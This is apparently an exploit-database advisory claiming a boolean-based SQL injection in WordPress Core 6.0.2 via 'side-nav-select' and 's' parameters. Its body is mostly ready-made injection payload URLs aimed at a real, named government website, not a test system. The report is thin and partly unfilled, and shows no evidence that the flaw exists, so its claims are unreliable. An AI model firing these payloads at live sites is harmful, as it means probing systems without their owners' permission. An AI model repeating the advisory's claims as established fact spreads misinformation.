WordPress Core 6.0.2 - 'side-nav-select' SQL Injection

2023.01.09
ir E1.Coders (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

There is a sql injection vulnerability in the WordPress Core 6.0.2 - "side-nav-select" and "s" and "COOKIE" parameter that allows an attacker to easily attack and access the database using the GET SQL INJECTION Boolean Based String method. Steps To Reproduce: [add details for how we can reproduce the issue, include key information such as Curl commands, HTTP Request/Response, payload information etc.] vuln type :SQLInjection refer address : https://www.wh.gov/briefing-room/ request type : GET action url : https://www.wh.gov/?s=3796170&side-nav-select=https://www.wh.gov/briefing-room/ parameter : side-nav-select description : GET SQL INJECTION BooleanBased String POC : https://www.wh.gov/?s=3796170&side-nav-select=https://www.wh.gov/briefing-room/%27 aNd 6400359=6400359 aNd %276199%27=%276199 vuln type :SQLInjection refer address : https://www.wh.gov/about-the-white-house/the-grounds/ request type : GET action url : https://www.wh.gov/?s=2794340&side-nav-select=99999999 parameter : side-nav-select description : GET SQL INJECTION BooleanBased String POC : https://www.wh.gov/?s=2794340&side-nav-select=99999999%27/**/oR/**/8412388=8412388/**/aNd/**/%276199%27=%276199 vuln type :SQLInjection refer address : https://www.wh.gov/ request type : COOKIE action url : https://www.wh.gov/?s=99999999 parameter : s description : COOKIE SQL INJECTION BooleanBased String POC : https://www.wh.gov/?s=99999999%27) oR 3220320=3220320--%20 vuln type : SQLInjection refer address : https://www.wh.gov/administration/vice-president-harris/ request type : COOKIE action url : https://www.wh.gov/?side-nav-select=https://www.wh.gov/administration/president-biden/&s=9469962 parameter : s description : COOKIE SQL INJECTION BooleanBased String POC : https://www.wh.gov/?side-nav-select=https://www.wh.gov/administration/president-biden/&s=9469962%27)/**/aNd/**/2848463=2848463/**/aNd/**/(%276199%27)=(%276199 vuln type : SQLInjection refer address : https://www.wh.gov/es/ request type : GET action url : https://www.wh.gov/es/?s=2163610 parameter : s description : GET SQL INJECTION BooleanBased Integer POC : https://www.wh.gov/es/?s=2163610 aNd 4105688=4105688 aNd 7193=7193 vuln type : SQLInjection refer address : https://www.wh.gov/es/administracion/presidente-biden/ request type : COOKIE action url : https://www.wh.gov/es/?s=4255397&side-nav-select=https://www.wh.gov/es/administracion/presidente-biden/ parameter : side-nav-select description : COOKIE SQL INJECTION BooleanBased String POC : https://www.wh.gov/es/?s=4255397&side-nav-select=https://www.wh.gov/es/administracion/presidente-biden/%27)/**/aNd/**/6672058=6672058/**/aNd/**/(%276199%27)=(%276199


Vote for this issue:
62%
38%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top